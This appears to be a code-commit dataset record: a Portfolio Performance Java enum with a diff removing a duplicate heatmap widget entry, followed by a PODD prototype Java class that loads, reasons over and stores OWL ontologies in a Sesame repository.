ASSET_CHART(Messages.LabelAssetChart, Messages.LabelStatementOfAssets, (widget, data) -> new ChartWidget(widget, data, DataSeries.UseCase.STATEMENT_OF_ASSETS)), HEATMAP(Messages.LabelHeatmap, Messages.ClientEditorLabelPerformance, PerformanceHeatmapWidget::new), HEATMAP_YEARLY(Messages.LabelYearlyHeatmap, Messages.ClientEditorLabelPerformance, YearlyPerformanceHeatmapWidget::new), HEATMAP_EARNINGS(Messages.LabelHeatmapEarnings, Messages.LabelEarnings, EarningsHeatmapWidget::new), HEATMAP_INVESTMENTS(Messages.LabelHeatmapInvestments, Messages.LabelTrades, InvestmentHeatmapWidget::new), TRADES_BASIC_STATISTICS(Messages.LabelTradesBasicStatistics, Messages.LabelTrades, TradesWidget::new), TRADES_PROFIT_LOSS(Messages.LabelTradesProfitLoss, Messages.LabelTrades, 
TradesProfitLossWidget::new), TRADES_AVERAGE_HOLDING_PERIOD(Messages.LabelAverageHoldingPeriod, Messages.LabelTrades, TradesAverageHoldingPeriodWidget::new), TRADES_TURNOVER_RATIO(Messages.LabelTradesTurnoverRate, Messages.LabelTrades, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); OptionalDouble average = LongStream.of(index.getTotals()).average(); if (!average.isPresent() || average.getAsDouble() <= 0) return 0.0; long buy = LongStream.of(index.getBuys()).sum(); long sell = LongStream.of(index.getSells()).sum(); return Long.min(buy, sell) / average.getAsDouble(); }) // .withTooltip((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); String currency = data.getCurrencyConverter().getTermCurrency(); OptionalDouble average = LongStream.of(index.getTotals()).average(); long buy = LongStream.of(index.getBuys()).sum(); long sell = LongStream.of(index.getSells()).sum(); return MessageFormat.format(Messages.TooltipTurnoverRate, Values.Money.format(Money.of(currency, buy)), Values.Money.format(Money.of(currency, sell)), Values.Money.format(Money.of(currency, (long)average.orElse(0))), Values.Percent2.format(average.isPresent() && average.getAsDouble() > 0 ? Long.min(buy, sell) / average.getAsDouble() : 0)); }) // .withColoredValues(false) .build()), HEATMAP_INVESTMENTS(Messages.LabelHeatmapInvestments, Messages.LabelTrades, InvestmentHeatmapWidget::new), CURRENT_DATE(Messages.LabelCurrentDate, Messages.LabelCommon, CurrentDateWidget::new), EXCHANGE_RATE(Messages.LabelExchangeRate, Messages.LabelCommon, ExchangeRateWidget::new), ACTIVITY_CHART(Messages.LabelTradingActivityChart, Messages.LabelCommon, ActivityWidget::new), // typo is API now!! VERTICAL_SPACEER(Messages.LabelVerticalSpacer, Messages.LabelCommon, VerticalSpacerWidget::new); private String label; private String group; private BiFunction<Dashboard.Widget, DashboardData, WidgetDelegate<?>> createFunction; private WidgetFactory(String label, String group, BiFunction<Dashboard.Widget, DashboardData, WidgetDelegate<?>> createFunction) { this.label = label; this.group = group; this.createFunction = createFunction; } public String getLabel() { return label; } public String getGroup() { return group; } public WidgetDelegate<?> create(Dashboard.Widget widget, DashboardData data) { return this.createFunction.apply(widget, data); } }
Fixed duplicate entry in widget factory enum Issue: #2200
name.abuchen.portfolio.ui/src/name/abuchen/portfolio/ui/views/dashboard/WidgetFactory.java
Fixed duplicate entry in widget factory enum
<ide><path>ame.abuchen.portfolio.ui/src/name/abuchen/portfolio/ui/views/dashboard/WidgetFactory.java <ide> YearlyPerformanceHeatmapWidget::new), <ide> <ide> HEATMAP_EARNINGS(Messages.LabelHeatmapEarnings, Messages.LabelEarnings, EarningsHeatmapWidget::new), <del> <del> HEATMAP_INVESTMENTS(Messages.LabelHeatmapInvestments, Messages.LabelTrades, InvestmentHeatmapWidget::new), <ide> <ide> TRADES_BASIC_STATISTICS(Messages.LabelTradesBasicStatistics, Messages.LabelTrades, TradesWidget::new), <ide>
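The TRADES_TURNOVER_RATIO widget in this record boils down to a small calculation: the lesser of total purchases and total sales over the period, divided by the average portfolio value, with a guard for an empty or zero average. A standalone sketch of just that arithmetic; the method, array names, and sample figures are illustrative and not part of the project's API:

import java.util.OptionalDouble;
import java.util.stream.LongStream;

public final class TurnoverRatioSketch {

    // totals: portfolio value per day; buys/sells: purchase and sale volumes per day (same units).
    static double turnoverRate(long[] totals, long[] buys, long[] sells) {
        OptionalDouble average = LongStream.of(totals).average();
        if (!average.isPresent() || average.getAsDouble() <= 0) {
            return 0.0;                              // no meaningful denominator
        }
        long bought = LongStream.of(buys).sum();
        long sold = LongStream.of(sells).sum();
        return Long.min(bought, sold) / average.getAsDouble();
    }

    public static void main(String[] args) {
        long[] totals = {10_000, 10_500, 11_000};
        long[] buys = {2_000, 0, 500};
        long[] sells = {0, 1_000, 0};
        System.out.println(turnoverRate(totals, buys, sells));   // roughly 0.0952
    }
}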
Java
agpl-3.0
4d57818771c3fa773fa250dda8a8e4d34ac6395d
0
podd/podd-redesign,podd/podd-redesign,podd/podd-redesign,podd/podd-redesign
/** * */ package com.github.podd.prototype; import java.io.IOException; import org.junit.Assert; import org.openrdf.model.Resource; import org.openrdf.model.URI; import org.openrdf.model.impl.ValueFactoryImpl; import org.openrdf.model.vocabulary.OWL; import org.openrdf.model.vocabulary.RDF; import org.openrdf.repository.RepositoryConnection; import org.openrdf.repository.RepositoryException; import org.openrdf.repository.util.RDFInserter; import org.semanticweb.owlapi.formats.RDFXMLOntologyFormatFactory; import org.semanticweb.owlapi.io.StreamDocumentSource; import org.semanticweb.owlapi.model.IRI; import org.semanticweb.owlapi.model.OWLOntology; import org.semanticweb.owlapi.model.OWLOntologyChangeException; import org.semanticweb.owlapi.model.OWLOntologyCreationException; import org.semanticweb.owlapi.model.OWLOntologyID; import org.semanticweb.owlapi.model.OWLOntologyManager; import org.semanticweb.owlapi.model.SetOntologyID; import org.semanticweb.owlapi.profiles.OWLProfile; import org.semanticweb.owlapi.profiles.OWLProfileRegistry; import org.semanticweb.owlapi.profiles.OWLProfileReport; import org.semanticweb.owlapi.reasoner.InconsistentOntologyException; import org.semanticweb.owlapi.reasoner.InferenceType; import org.semanticweb.owlapi.reasoner.OWLReasoner; import org.semanticweb.owlapi.reasoner.OWLReasonerFactory; import org.semanticweb.owlapi.reasoner.ReasonerInterruptedException; import org.semanticweb.owlapi.reasoner.TimeOutException; import org.semanticweb.owlapi.rio.RioMemoryTripleSource; import org.semanticweb.owlapi.rio.RioRenderer; import org.semanticweb.owlapi.util.InferredOntologyGenerator; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * A selection of utilities used to create the prototype. * * @author Peter Ansell [email protected] * */ public class PoddPrototypeUtils { /** * This URI is not currently in the Sesame OWL namespace, so we create a constant here as it is * vital to our strategy. */ public static final URI OWL_VERSION_IRI = ValueFactoryImpl.getInstance().createURI(OWL.NAMESPACE, "versionIRI"); /** * The OMV vocabulary defines a property for the current version of an ontology, so we are * reusing it here. */ public static final URI OMV_CURRENT_VERSION = ValueFactoryImpl.getInstance().createURI( "http://omv.ontoware.org/ontology#", "currentVersion"); /** * Creating a property for PODD to track the currentInferredVersion for the inferred axioms * ontology when linking from the ontology IRI. */ public static final URI PODD_BASE_CURRENT_INFERRED_VERSION = ValueFactoryImpl.getInstance().createURI( "http://purl.org/podd/ns/poddBase#", "currentInferredVersion"); /** * Creating a property for PODD to track the inferredVersion for the inferred axioms ontology of * a particular versioned ontology. */ public static final URI PODD_BASE_INFERRED_VERSION = ValueFactoryImpl.getInstance().createURI( "http://purl.org/podd/ns/poddBase#", "inferredVersion"); /** * An arbitrary prefix to use for automatically assigning ontology IRIs to inferred ontologies. * There are no versions delegated to inferred ontologies, and the ontology IRI is generated * using the version IRI of the original ontology, which must be unique. */ private static final String INFERRED_PREFIX = "urn:podd:inferred:ontologyiriprefix:"; private final Logger log = LoggerFactory.getLogger(this.getClass()); /** * The manager that will be used to manage the Schema Ontologies. 
* * TODO: Decide how to manage PODD Artifact ontologies that will typically have smaller * lifetimes than Schema Ontologies which will stay in the manager for the lifetime of the * manager, until the next shutdown or maintenance period when they may be changed. PODD * Artifact ontologies may import Schema Ontologies so their manager needs to be able to access * the list of Schema Ontologies. However, PODD Artifact ontologies must not stay in the manager * for long periods of time or they will cause unsustainable memory growth, particularly for * large ontologies with many versions. * * TODO: How does an edit conflict resolution strategy work in relation to this manager. * Ideally, we should also only be storing the latest version of a PODD Artifact in the manager. * If we are performing edit conflict resolution based solely on RDF triples and not OWL Axioms, * then we may be able to perform the diff externally. See the Protege OWL Diff code for * examples of how to diff ontologies. */ private OWLOntologyManager manager; /** * A factory for producing reasoners that are suitable according to owlProfile. */ private OWLReasonerFactory reasonerFactory; /** * The graph used to manage Schema Ontologies. This is distinct from the graph used to manage * PODD Artifacts. */ private URI schemaGraph; /** * The graph used to manage PODD Artifacts. This is distinct from the graph used to manage * Schema Ontologies. */ private URI artifactGraph; /** * The OWLProfile that matches the reasoners produced by the reasonerFactory. This enables a * faster pre-reasoner check to very that the ontology is in the profile before attempting to * reason over the entire ontology. */ private IRI owlProfile; /** * * @param nextManager * The OWLOntologyManager instance that will be used to store ontologies in memory. * @param nextOwlProfile * The IRI of the OWL Profile that matches the reasoner factory, and will be used to * check for basic consistency before using the reasoner. * @param nextReasonerFactory * The reasoner factory that will be used to create reasoners for consistency checks * and for inferring extra triples. * @param nextSchemaGraph * The Graph URI that will be used for storing the schema ontology management * statements. * @param nextPoddArtifactGraph * TODO * */ public PoddPrototypeUtils(final OWLOntologyManager nextManager, final IRI nextOwlProfile, final OWLReasonerFactory nextReasonerFactory, final URI nextSchemaGraph, final URI nextPoddArtifactGraph) { this.manager = nextManager; this.owlProfile = nextOwlProfile; this.reasonerFactory = nextReasonerFactory; this.schemaGraph = nextSchemaGraph; this.artifactGraph = nextPoddArtifactGraph; } /** * Checks the consistency of the ontology and returns the instance of OWLReasoner that was used * to check the consistency. * * @param nextOntology * The ontology to check for consistency. 
* @return An instance of OWLreasoner that was used to check the consistency.s * @throws Exception */ public OWLReasoner checkConsistency(final OWLOntology nextOntology) throws Exception { final OWLProfile nextProfile = OWLProfileRegistry.getInstance().getProfile(this.owlProfile); Assert.assertNotNull("Could not find profile in registry: " + this.owlProfile.toQuotedString(), nextProfile); final OWLProfileReport profileReport = nextProfile.checkOntology(nextOntology); if(!profileReport.isInProfile()) { this.log.error("Bad profile report count: {}", profileReport.getViolations().size()); this.log.error("Bad profile report: {}", profileReport); } Assert.assertTrue("Schema Ontology was not in the given profile: " + nextOntology.getOntologyID().toString(), profileReport.isInProfile()); // create an OWL Reasoner using the Pellet library and ensure that the reasoner thinks the // ontology is consistent so far // Use the factory that we found to create a reasoner over the ontology final OWLReasoner nextReasoner = this.reasonerFactory.createReasoner(nextOntology); // Test that the ontology was consistent with this reasoner // This ensures in the case of Pellet that it is in the OWL2-DL profile Assert.assertTrue("Ontology was not consistent: " + nextOntology.getOntologyID().toString(), nextReasoner.isConsistent()); return nextReasoner; } /** * Computes the inferences using the given reasoner, which has previously been setup based on an * ontology. * * @param nextReasoner * The reasoner to use to compute the inferences. * @param inferredOntologyID * The OWLOntologyID to use for the inferred ontology. This must be unique and not * previously used in either the repository or the OWLOntologyManager * @return An OWLOntology instance containing the axioms that were inferred from the original * ontology. * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public OWLOntology computeInferences(final OWLReasoner nextReasoner, final OWLOntologyID inferredOntologyID) throws ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { nextReasoner.precomputeInferences(InferenceType.CLASS_HIERARCHY); final InferredOntologyGenerator iog = new InferredOntologyGenerator(nextReasoner); final OWLOntology nextInferredAxiomsOntology = this.manager.createOntology(inferredOntologyID); iog.fillOntology(this.manager, nextInferredAxiomsOntology); return nextInferredAxiomsOntology; } /** * Dump the triples representing a given ontology into a Sesame Repository. * * @param nextOntology * The ontology to dump into the repository. * @param nextRepositoryConnection * The repository connection to dump the triples into. 
* @throws IOException * @throws RepositoryException */ public void dumpOntologyToRepository(final OWLOntology nextOntology, final RepositoryConnection nextRepositoryConnection) throws IOException, RepositoryException { try { // Create an RDFHandler that will insert all triples after they are emitted from OWLAPI // into a single context in the Sesame Repository final RDFInserter repositoryHandler = new RDFInserter(nextRepositoryConnection); repositoryHandler.enforceContext(nextOntology.getOntologyID().getVersionIRI().toOpenRDFURI()); // Render the triples out from OWLAPI into a Sesame Repository final RioRenderer renderer = new RioRenderer(nextOntology, this.manager, repositoryHandler, null, nextOntology.getOntologyID() .getVersionIRI().toOpenRDFURI()); renderer.render(); // Commit the current repository connection nextRepositoryConnection.commit(); } catch(final RepositoryException e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } /** * Generates a unique inferred ontology ID based on the original ontology ID version IRI. * * Both ontology IRI and version IRI for the resulting ontology ID are the same to ensure * consistency. * * @param originalOntologyID * The original ontology ID to use for naming the inferred ontology. * @return An instance of OWLOntologyID that can be used to name an inferred ontology. */ public OWLOntologyID generateInferredOntologyID(final OWLOntologyID originalOntologyID) { return new OWLOntologyID(IRI.create(PoddPrototypeUtils.INFERRED_PREFIX + originalOntologyID.getVersionIRI()), IRI.create(PoddPrototypeUtils.INFERRED_PREFIX + originalOntologyID.getVersionIRI())); } /** * Loads an ontology from a classpath resource, renames the ontology using the given * OWLOntologyID, checks the consistency of the ontology, infers statements from the ontology, * and stores the inferred statements. * * <br /> * * The given OWLOntologyID will be assigned to the ontology after it is loaded. * * <br /> * * IMPORTANT: The inferred ontology has an ontology IRI that is derived from the version IRI of * the loaded ontology. The version IRI in the given OWLOntologyID must be unique for this * process to succeed. * * @param ontologyResourcePath * The classpath resource to load the ontology from. * @param nextRepositoryConnection * The repository connection to use for storing the ontology and the inferred * statements. * @throws Exception * @throws IOException * @throws RepositoryException * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public InferredOWLOntologyID loadInferAndStoreSchemaOntology(final String ontologyResourcePath, final OWLOntologyID newOWLOntologyID, final RepositoryConnection nextRepositoryConnection) throws Exception, IOException, RepositoryException, ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { // TODO: Create a version of this method that utilises the // loadOntology(RepositoryConnection...) method final OWLOntology nextOntology = this.loadOntology(ontologyResourcePath); // rename the ontology // This step is necessary for cases where the loaded ontology either does not have an // owl:versionIRI statement, or the versionIRI will not be unique in the repository. 
// IMPORTANT NOTE: // The version IRI must be unique in the manager before this step or the load will fail due // to the ontology already existing! // FIXME: To get around this we would need to load the ontology into memory as RDF // statements and modify it before loading it out of the in-memory ontology, which is very // possible... this.manager.applyChange(new SetOntologyID(nextOntology, newOWLOntologyID)); final OWLReasoner reasoner = this.checkConsistency(nextOntology); this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // update the link in the schema ontology management graph this.updateCurrentManagedSchemaOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Loads an ontology from a classpath resource, checks the consistency of the ontology, infers * statements from the ontology, and stores the inferred statements. * * <br /> * * The ontology IRI and version IRI are taken from inside the ontology after it is loaded. * * <br /> * * IMPORTANT: The inferred ontology has an ontology IRI that is derived from the version IRI of * the loaded ontology. The version IRI of the loaded ontology must be unique for this process * to succeed. * * @param ontologyResourcePath * The classpath resource to load the ontology from. * @param nextRepositoryConnection * The repository connection to use for storing the ontology and the inferred * statements. * @throws Exception * @throws IOException * @throws RepositoryException * @throws ReasonerInterruptedException * @throws TimeOutException * @throws InconsistentOntologyException * @throws OWLOntologyCreationException * @throws OWLOntologyChangeException */ public InferredOWLOntologyID loadInferAndStoreSchemaOntology(final String ontologyResourcePath, final RepositoryConnection nextRepositoryConnection) throws Exception, IOException, RepositoryException, ReasonerInterruptedException, TimeOutException, InconsistentOntologyException, OWLOntologyCreationException, OWLOntologyChangeException { // TODO: Create a version of this method that utilises the // loadOntology(RepositoryConnection...) 
method final OWLOntology nextOntology = this.loadOntology(ontologyResourcePath); final OWLReasoner reasoner = this.checkConsistency(nextOntology); this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // update the link in the schema ontology management graph this.updateCurrentManagedSchemaOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Loads an ontology from a Sesame RepositoryConnection, given an optional set of contexts. * * @param conn * The Sesame RepositoryConnection object to use when loading the ontology. * @param contexts * An optional varargs array of contexts specifying the contexts to use when loading * the ontology. If this is missing the entire repository will be used. * @return An OWLOntology instance populated with the triples from the repository. * @throws Exception */ public OWLOntology loadOntology(final RepositoryConnection conn, final Resource... contexts) throws Exception { final RioMemoryTripleSource tripleSource = new RioMemoryTripleSource(conn.getStatements(null, null, null, true, contexts)); tripleSource.setNamespaces(conn.getNamespaces()); final OWLOntology nextOntology = this.manager.loadOntologyFromOntologyDocument(tripleSource); Assert.assertFalse(nextOntology.isEmpty()); return nextOntology; } /** * Loads an ontology from a Java Resource on the classpath. This is useful for loading test * resources. * * NOTE: We currently assume that the ontology will be in RDF/XML. Outside of the prototype we * cannot make this assumption as any RDF or OWL format may be used. * * @param ontologyResource * The classpath location of the test resource to load. * @return An OWLOntology instance populated with the triples from the classpath resource. * @throws Exception */ public OWLOntology loadOntology(final String ontologyResource) throws Exception { final OWLOntology nextOntology = this.manager.loadOntologyFromOntologyDocument(new StreamDocumentSource(this.getClass() .getResourceAsStream(ontologyResource), new RDFXMLOntologyFormatFactory())); Assert.assertFalse(nextOntology.isEmpty()); return nextOntology; } /** * Loads a PODD Artifact from the given classpath resource into the database and into the * OWLOntologyManager. * * This includes verifying that it fits with the expected profile, and verifying that it is * consistent with the configured reasoner. * * @param artifactResourcePath * @param nextRepositoryConnection * @return * @throws Exception */ public InferredOWLOntologyID loadPoddArtifact(final String artifactResourcePath, final RepositoryConnection nextRepositoryConnection) throws Exception { // 1. Create permanent identifiers for any impermanent identifiers in the object... // FIXME: May need to load the triples into a temporary location to rewrite the impermanent // identifiers before loading it into the OWLOntologyManager this.log.info("Loading podd artifact from: {}", artifactResourcePath); final OWLOntology nextOntology = this.loadOntology(artifactResourcePath); // 2. 
Validate the object in terms of the OWL profile // 3. Validate the object using a reasoner this.log.info("Checking consistency of podd artifact"); final OWLReasoner reasoner = this.checkConsistency(nextOntology); // 4. Store the object this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); // 5. Infer extra statements about the object using a reasoner this.log.info("Computing inferences for podd artifact"); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository // 6. Store the inferred statements this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // 7. Update the PODD Artifact management graph to contain the latest // update the link in the PODD Artifact management graph this.updateCurrentManagedPoddArtifactOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Removes the PODD Artifact from the OWLOntologyManager. * * NOTE: The Artifact is still in the database after this point, it is just no longer in memory. * * @param poddArtifact * The InferredOWLOntologyID of the PODD Artifact to remove */ public void removePoddArtifactFromManager(final InferredOWLOntologyID poddArtifact) { Assert.assertTrue(this.manager.contains(poddArtifact)); this.removePoddArtifactFromManager(poddArtifact.getBaseOWLOntologyID(), poddArtifact.getInferredOWLOntologyID()); } /** * Removes the PODD Artifact from the OWLOntologyManager using two different OWLOntologyID * references for the base and inferred ontologies respectively. * * NOTE: The Artifact is still in the database after this point, it is just no longer in memory. * * @param baseOntologyID * The base OWLOntologyID of the Artifact to be removed. * @param inferredOntologyID * The inferred OWLOntologyID of the Artifact to be removed. */ public void removePoddArtifactFromManager(final OWLOntologyID baseOntologyID, final OWLOntologyID inferredOntologyID) { Assert.assertTrue(this.manager.contains(baseOntologyID)); Assert.assertTrue(this.manager.contains(inferredOntologyID)); this.manager.removeOntology(baseOntologyID); Assert.assertFalse(this.manager.contains(baseOntologyID)); this.manager.removeOntology(inferredOntologyID); Assert.assertFalse(this.manager.contains(inferredOntologyID)); } /** * This method adds information to the Schema Ontology management graph, and updates the links * for the current version for both the ontology and the inferred ontology. * * @param nextRepositoryConnection * The repository connection to use for updating the code. The schema graph/context * to use is setup as a member variable. * @param nextOntologyID * The ontology ID that contains the information about the original ontology. * @param nextInferredOntologyID * The ontology ID that contains the information about the inferred ontology. 
* @throws RepositoryException */ public void updateCurrentManagedPoddArtifactOntologyVersion(final RepositoryConnection nextRepositoryConnection, final OWLOntologyID nextOntologyID, final OWLOntologyID nextInferredOntologyID) throws RepositoryException { final URI nextOntologyUri = nextOntologyID.getOntologyIRI().toOpenRDFURI(); final URI nextVersionUri = nextOntologyID.getVersionIRI().toOpenRDFURI(); // NOTE: The version is not used for the inferred ontology ID. A new ontology URI must be // generated for each new inferred ontology generation. For reference though, the version is // equal to the ontology IRI in the prototype code. See generateInferredOntologyID method // for the corresponding code. final URI nextInferredOntologyUri = nextInferredOntologyID.getOntologyIRI().toOpenRDFURI(); try { // type the ontology nextRepositoryConnection.add(nextOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.artifactGraph); // setup a version number link for this version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OWL_VERSION_IRI, nextVersionUri, this.artifactGraph); // remove whatever was previously there for the current version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, null, this.artifactGraph); // then insert the new current version marker nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, nextVersionUri, this.artifactGraph); // then do a similar process with the inferred axioms ontology nextRepositoryConnection.add(nextInferredOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.artifactGraph); // remove whatever was previously there for the current inferred version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, null, this.artifactGraph); // link from the ontology IRI to the current inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, nextInferredOntologyUri, this.artifactGraph); // link from the ontology version IRI to the matching inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_INFERRED_VERSION, nextInferredOntologyUri, this.artifactGraph); // if everything went well commit the connection nextRepositoryConnection.commit(); } catch(final RepositoryException e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } /** * This method adds information to the Schema Ontology management graph, and updates the links * for the current version for both the ontology and the inferred ontology. * * @param nextRepositoryConnection * The repository connection to use for updating the code. The schema graph/context * to use is setup as a member variable. * @param nextOntologyID * The ontology ID that contains the information about the original ontology. * @param nextInferredOntologyID * The ontology ID that contains the information about the inferred ontology. * @throws RepositoryException */ public void updateCurrentManagedSchemaOntologyVersion(final RepositoryConnection nextRepositoryConnection, final OWLOntologyID nextOntologyID, final OWLOntologyID nextInferredOntologyID) throws RepositoryException { final URI nextOntologyUri = nextOntologyID.getOntologyIRI().toOpenRDFURI(); final URI nextVersionUri = nextOntologyID.getVersionIRI().toOpenRDFURI(); // NOTE: The version is not used for the inferred ontology ID. 
A new ontology URI must be // generated for each new inferred ontology generation. For reference though, the version is // equal to the ontology IRI in the prototype code. See generateInferredOntologyID method // for the corresponding code. final URI nextInferredOntologyUri = nextInferredOntologyID.getOntologyIRI().toOpenRDFURI(); try { // type the ontology nextRepositoryConnection.add(nextOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.schemaGraph); // setup a version number link for this version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OWL_VERSION_IRI, nextVersionUri, this.schemaGraph); // remove whatever was previously there for the current version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, null, this.schemaGraph); // then insert the new current version marker nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, nextVersionUri, this.schemaGraph); // then do a similar process with the inferred axioms ontology nextRepositoryConnection.add(nextInferredOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.schemaGraph); // remove whatever was previously there for the current inferred version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, null, this.schemaGraph); // link from the ontology IRI to the current inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, nextInferredOntologyUri, this.schemaGraph); // link from the ontology version IRI to the matching inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_INFERRED_VERSION, nextInferredOntologyUri, this.schemaGraph); // if everything went well commit the connection nextRepositoryConnection.commit(); } catch(final RepositoryException e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } }
podd-prototype/src/main/java/com/github/podd/prototype/PoddPrototypeUtils.java
/** * */ package com.github.podd.prototype; import java.io.IOException; import org.junit.Assert; import org.openrdf.model.Resource; import org.openrdf.model.URI; import org.openrdf.model.impl.ValueFactoryImpl; import org.openrdf.model.vocabulary.OWL; import org.openrdf.model.vocabulary.RDF; import org.openrdf.repository.RepositoryConnection; import org.openrdf.repository.RepositoryException; import org.openrdf.repository.util.RDFInserter; import org.semanticweb.owlapi.formats.RDFXMLOntologyFormatFactory; import org.semanticweb.owlapi.io.StreamDocumentSource; import org.semanticweb.owlapi.model.IRI; import org.semanticweb.owlapi.model.OWLOntology; import org.semanticweb.owlapi.model.OWLOntologyChangeException; import org.semanticweb.owlapi.model.OWLOntologyCreationException; import org.semanticweb.owlapi.model.OWLOntologyID; import org.semanticweb.owlapi.model.OWLOntologyManager; import org.semanticweb.owlapi.model.SetOntologyID; import org.semanticweb.owlapi.profiles.OWLProfile; import org.semanticweb.owlapi.profiles.OWLProfileRegistry; import org.semanticweb.owlapi.profiles.OWLProfileReport; import org.semanticweb.owlapi.reasoner.InconsistentOntologyException; import org.semanticweb.owlapi.reasoner.InferenceType; import org.semanticweb.owlapi.reasoner.OWLReasoner; import org.semanticweb.owlapi.reasoner.OWLReasonerFactory; import org.semanticweb.owlapi.reasoner.ReasonerInterruptedException; import org.semanticweb.owlapi.reasoner.TimeOutException; import org.semanticweb.owlapi.rio.RioMemoryTripleSource; import org.semanticweb.owlapi.rio.RioRenderer; import org.semanticweb.owlapi.util.InferredOntologyGenerator; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * A selection of utilities used to create the prototype. * * @author Peter Ansell [email protected] * */ public class PoddPrototypeUtils { /** * This URI is not currently in the Sesame OWL namespace, so we create a constant here as it is * vital to our strategy. */ public static final URI OWL_VERSION_IRI = ValueFactoryImpl.getInstance().createURI(OWL.NAMESPACE, "versionIRI"); /** * The OMV vocabulary defines a property for the current version of an ontology, so we are * reusing it here. */ public static final URI OMV_CURRENT_VERSION = ValueFactoryImpl.getInstance().createURI( "http://omv.ontoware.org/ontology#", "currentVersion"); /** * Creating a property for PODD to track the currentInferredVersion for the inferred axioms * ontology when linking from the ontology IRI. */ public static final URI PODD_BASE_CURRENT_INFERRED_VERSION = ValueFactoryImpl.getInstance().createURI( "http://purl.org/podd/ns/poddBase#", "currentInferredVersion"); /** * Creating a property for PODD to track the inferredVersion for the inferred axioms ontology of * a particular versioned ontology. */ public static final URI PODD_BASE_INFERRED_VERSION = ValueFactoryImpl.getInstance().createURI( "http://purl.org/podd/ns/poddBase#", "inferredVersion"); /** * An arbitrary prefix to use for automatically assigning ontology IRIs to inferred ontologies. * There are no versions delegated to inferred ontologies, and the ontology IRI is generated * using the version IRI of the original ontology, which must be unique. */ private static final String INFERRED_PREFIX = "urn:podd:inferred:ontologyiriprefix:"; private final Logger log = LoggerFactory.getLogger(this.getClass()); /** * The manager that will be used to manage the Schema Ontologies. 
